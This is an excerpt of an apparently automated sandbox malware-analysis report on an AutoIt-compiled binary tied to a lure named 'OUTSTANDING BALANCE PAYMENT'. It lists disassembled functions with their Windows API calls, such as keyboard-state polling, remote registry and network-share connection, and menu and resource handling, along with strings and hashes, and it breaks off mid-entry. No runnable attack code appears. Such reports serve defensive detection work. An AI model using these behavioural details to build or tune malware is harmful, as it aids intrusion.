                                                                  • Opcode ID: 5918e0c6258f690f92ab08a296764f21cb3d5e00a04668678864877b50e83b8f
                                                                  • Instruction ID: 2b2e7fa06263c9492e0b6eab5a1b2a93ab084df2cf520317068c418e3d443516
                                                                  • Opcode Fuzzy Hash: 5918e0c6258f690f92ab08a296764f21cb3d5e00a04668678864877b50e83b8f
                                                                  • Instruction Fuzzy Hash: 02517E35811519AACB15FBE0CD46EEEB778AF09304F204169F509721A2EB316F69DF60
                                                                  Function 002CCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: LoadString__swprintf_wprintf
                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                  • API String ID: 2889450990-3420473620
                                                                  • Opcode ID: 37fb827a0d774a0b54c314f9cf31d898f1154bb8be20b611dace50751c8c4f56
                                                                  • Instruction ID: 0aa5b3a2e336b3774847ce186422b9187edcdc29e78769445803a6de445f71a3
                                                                  • Opcode Fuzzy Hash: 37fb827a0d774a0b54c314f9cf31d898f1154bb8be20b611dace50751c8c4f56
                                                                  • Instruction Fuzzy Hash: 4051B135810619AACB15FBE0CD46FEEB778AF05304F204166F50972092EB756FA9DF60
                                                                  Function 002E3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: $E3$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                  • API String ID: 3964851224-1697164405
                                                                  • Opcode ID: 2042f5927bdb25fad5585c631afebc3324cf41c470225c4592355499c3218cf8
                                                                  • Instruction ID: c5e169aa595591c568fced98dd85bad0d4812279cb55b656c118a057d81515d7
                                                                  • Opcode Fuzzy Hash: 2042f5927bdb25fad5585c631afebc3324cf41c470225c4592355499c3218cf8
                                                                  • Instruction Fuzzy Hash: 46417E3517028A9BDF05EF11DC85AEA3365BF12701F914855EC955B392EB70EE2ACF10
                                                                  Function 002C55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C55D7
                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 002C5664
                                                                  • GetMenuItemCount.USER32(00341708), ref: 002C56ED
                                                                  • DeleteMenu.USER32(00341708,00000005,00000000,000000F5,?,?), ref: 002C577D
                                                                  • DeleteMenu.USER32(00341708,00000004,00000000), ref: 002C5785
                                                                  • DeleteMenu.USER32(00341708,00000006,00000000), ref: 002C578D
                                                                  • DeleteMenu.USER32(00341708,00000003,00000000), ref: 002C5795
                                                                  • GetMenuItemCount.USER32(00341708), ref: 002C579D
                                                                  • SetMenuItemInfoW.USER32(00341708,00000004,00000000,00000030), ref: 002C57D3
                                                                  • GetCursorPos.USER32(?), ref: 002C57DD
                                                                  • SetForegroundWindow.USER32(00000000), ref: 002C57E6
                                                                  • TrackPopupMenuEx.USER32(00341708,00000000,?,00000000,00000000,00000000), ref: 002C57F9
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002C5805
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 3993528054-0
                                                                  • Opcode ID: 7aa33ecdb51ff605063157dea72716e2640c4940ae630839a28ab49fa83f1b92
                                                                  • Instruction ID: cf8eeac666f571391035be9d6b65117582b3991311e70958951731bc23e21b65
                                                                  • Opcode Fuzzy Hash: 7aa33ecdb51ff605063157dea72716e2640c4940ae630839a28ab49fa83f1b92
                                                                  • Instruction Fuzzy Hash: A471F630661A26BEEB219F54CC59FAABF69FF01364F240309F5146A1D1C7B1B8A0DB50
                                                                  Function 002BA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002BA1DC
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002BA211
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002BA22D
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002BA249
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002BA273
                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002BA29B
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002BA2A6
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002BA2AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 1687751970-22481851
                                                                  • Opcode ID: 1cda14a6bd231237acda910ab640bd802511bdff1e38a0298773da591c16b0ba
                                                                  • Instruction ID: 5bc4df57fcd533d34a47c79a9a0253fb6b06ab43c2b1a0a8b3697e6a18521bfd
                                                                  • Opcode Fuzzy Hash: 1cda14a6bd231237acda910ab640bd802511bdff1e38a0298773da591c16b0ba
                                                                  • Instruction Fuzzy Hash: 0041E87AC21629ABDB11EFA4DC95DEEB7B8BF04344F00402AE815A71A1EB709E15CF50
                                                                  Function 002C67E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 002C67FD
                                                                  • __swprintf.LIBCMT ref: 002C680A
                                                                    • Part of subcall function 002A172B: __woutput_l.LIBCMT ref: 002A1784
                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 002C6834
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002C6840
                                                                  • LockResource.KERNEL32(00000000), ref: 002C684D
                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 002C686D
                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002C687F
                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 002C688E
                                                                  • LockResource.KERNEL32(?), ref: 002C689A
                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002C68F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                  • String ID: 53
                                                                  • API String ID: 1433390588-4191172412
                                                                  • Opcode ID: 68411ba2d3836ed6fc353429ee6e055f276b74a5a3f9edc5f1ea19fc5eb134a4
                                                                  • Instruction ID: d517c9e8c4ada4b43a35f6ff33f33595f1e08d76e68ec13b3368abedbdc4bfab
                                                                  • Opcode Fuzzy Hash: 68411ba2d3836ed6fc353429ee6e055f276b74a5a3f9edc5f1ea19fc5eb134a4
                                                                  • Instruction Fuzzy Hash: D731B27591121BABDB129FA0DD58EBF7BACEF09340F00462AF901D2150E774D965DBA0
                                                                  Function 002C25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002F36F4,00000010,?,Bad directive syntax error,0031DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002C25D6
                                                                  • LoadStringW.USER32(00000000,?,002F36F4,00000010), ref: 002C25DD
                                                                  • _wprintf.LIBCMT ref: 002C2610
                                                                  • __swprintf.LIBCMT ref: 002C2632
                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002C26A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                  • API String ID: 1080873982-4153970271
                                                                  • Opcode ID: 6ba9e7dbbf0afb3932c6d05e14615f8542eedc872e1e9d25afde6106d2e4d477
                                                                  • Instruction ID: f04fe8af26177c33673f2ed7d24581b961059096bfb98e21b5c41c472d88b33b
                                                                  • Opcode Fuzzy Hash: 6ba9e7dbbf0afb3932c6d05e14615f8542eedc872e1e9d25afde6106d2e4d477
                                                                  • Instruction Fuzzy Hash: 7C214D3582021AAFCF16BF90CC4AFEE7B79BF19304F044459F505660A2DB75A668DF60
                                                                  Function 002C7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002C7B42
                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002C7B58
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002C7B69
                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002C7B7B
                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002C7B8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: SendString
                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                  • API String ID: 890592661-1007645807
                                                                  • Opcode ID: 3845d028a5994b931ddf72e1451f97e8eea46552c3bed309d4b09a5a849f5bef
                                                                  • Instruction ID: 8105a50a7b251eec257bd7b11e5033f237fcf72ebc515cf0cff43329d8c003a5
                                                                  • Opcode Fuzzy Hash: 3845d028a5994b931ddf72e1451f97e8eea46552c3bed309d4b09a5a849f5bef
                                                                  • Instruction Fuzzy Hash: C911C4A466126979D721B761CC8AEFFBABCEFD1B04F000519B411A60C1DA701E58CEB0
                                                                  Function 002C778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • timeGetTime.WINMM ref: 002C7794
                                                                    • Part of subcall function 0029DC38: timeGetTime.WINMM(?,7694B400,002F58AB), ref: 0029DC3C
                                                                  • Sleep.KERNEL32(0000000A), ref: 002C77C0
                                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 002C77E4
                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 002C7806
                                                                  • SetActiveWindow.USER32 ref: 002C7825
                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002C7833
                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 002C7852
                                                                  • Sleep.KERNEL32(000000FA), ref: 002C785D
                                                                  • IsWindow.USER32 ref: 002C7869
                                                                  • EndDialog.USER32(00000000), ref: 002C787A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                  • String ID: BUTTON
                                                                  • API String ID: 1194449130-3405671355
                                                                  • Opcode ID: 6fe4d00d1d80cc84a22da639c83088a58139c3c7baf053e5411094c7458db186
                                                                  • Instruction ID: 841a807776c47fbece619f2618954970aa080a6668a1d36658cd0f95ec89cab4
                                                                  • Opcode Fuzzy Hash: 6fe4d00d1d80cc84a22da639c83088a58139c3c7baf053e5411094c7458db186
                                                                  • Instruction Fuzzy Hash: 9C215078215209AFE7075FA0EC99F667F7DFB46348F400229F54587162CF61AC24DE20
                                                                  Function 002D02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CoInitialize.OLE32(00000000), ref: 002D034B
                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002D03DE
                                                                  • SHGetDesktopFolder.SHELL32(?), ref: 002D03F2
                                                                  • CoCreateInstance.OLE32(0030DA8C,00000000,00000001,00333CF8,?), ref: 002D043E
                                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002D04AD
                                                                  • CoTaskMemFree.OLE32(?,?), ref: 002D0505
                                                                  • _memset.LIBCMT ref: 002D0542
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 002D057E
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002D05A1
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 002D05A8
                                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 002D05DF
                                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 002D05E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                  • String ID:
                                                                  • API String ID: 1246142700-0
                                                                  • Opcode ID: 943f28e491bfe9df8add459438b4fb24eafbdc9c7ecaed1def3c12e00eb3f79e
                                                                  • Instruction ID: 4901cfbe8ef5f91a442a322ec05244452a24e0a38a86d2270eacbbe4612eaa6d
                                                                  • Opcode Fuzzy Hash: 943f28e491bfe9df8add459438b4fb24eafbdc9c7ecaed1def3c12e00eb3f79e
                                                                  • Instruction Fuzzy Hash: 14B1D975A10109AFDB05DFA4C898EAEBBB9FF48304F14849AE905EB261DB70ED51CF50
                                                                  Function 002C2E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 002C2ED6
                                                                  • SetKeyboardState.USER32(?), ref: 002C2F41
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 002C2F61
                                                                  • GetKeyState.USER32(000000A0), ref: 002C2F78
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 002C2FA7
                                                                  • GetKeyState.USER32(000000A1), ref: 002C2FB8
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 002C2FE4
                                                                  • GetKeyState.USER32(00000011), ref: 002C2FF2
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 002C301B
                                                                  • GetKeyState.USER32(00000012), ref: 002C3029
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 002C3052
                                                                  • GetKeyState.USER32(0000005B), ref: 002C3060
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: ad218e6014ddce8c53a7a54bda747b94cb8730b7b4dd7a6d202f340d35d42326
                                                                  • Instruction ID: f48fec2f184c48c54ba5a4eccd072ac2a662b8167509e9806cb2ec937047ee00
                                                                  • Opcode Fuzzy Hash: ad218e6014ddce8c53a7a54bda747b94cb8730b7b4dd7a6d202f340d35d42326
                                                                  • Instruction Fuzzy Hash: 2651E92191478969FB35EFA48810FEABFF45F11340F08879DC5C2565C2DE94AB9CCBA2
                                                                  Function 002BED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 002BED1E
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002BED30
                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002BED8E
                                                                  • GetDlgItem.USER32(?,00000002), ref: 002BED99
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002BEDAB
                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002BEE01
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 002BEE0F
                                                                  • GetWindowRect.USER32(00000000,?), ref: 002BEE20
                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002BEE63
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 002BEE71
                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002BEE8E
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 002BEE9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                  • String ID:
                                                                  • API String ID: 3096461208-0
                                                                  • Opcode ID: f78a3fbcd8c7caeeff7a0c7cdac62298b4d2f47731c21c99c44691ea73ad3810
                                                                  • Instruction ID: 7a73ccb17a1ace7bb96fc4ad7054ffb8dd1b53abfeaecdc1f46a8685d1603caa
                                                                  • Opcode Fuzzy Hash: f78a3fbcd8c7caeeff7a0c7cdac62298b4d2f47731c21c99c44691ea73ad3810
                                                                  • Instruction Fuzzy Hash: 875121B1B10209AFDF18CFA8DD95AAEBBFAEB88310F558129F519D7290D771DD008B10
                                                                  Function 0029B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0029B759,?,00000000,?,?,?,?,0029B72B,00000000,?), ref: 0029BA58
                                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0029B72B), ref: 0029B7F6
                                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 0029B88D
                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 002FD8A6
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 002FD8D7
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 002FD8EE
                                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0029B72B,00000000,?,?,0029B2EF,?,?), ref: 002FD90A
                                                                  • DeleteObject.GDI32(00000000), ref: 002FD91C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 641708696-0
                                                                  • Opcode ID: a71104368153b09936ead30695d89a549b265d1464455b7bc4c766860ee35fc8
                                                                  • Instruction ID: 7988c95462d42f9b7455ec3dcfd26982f01f9741cd8bad0d0f9e249bf4733109
                                                                  • Opcode Fuzzy Hash: a71104368153b09936ead30695d89a549b265d1464455b7bc4c766860ee35fc8
                                                                  • Instruction Fuzzy Hash: E761DE35421A05DFDF239F94EA88B35B7FAFB85352F150129E4464AA60CBB4B8A0CF40
                                                                  Function 0029B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B526: GetWindowLongW.USER32(?,000000EB), ref: 0029B537
                                                                  • GetSysColor.USER32(0000000F), ref: 0029B438
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
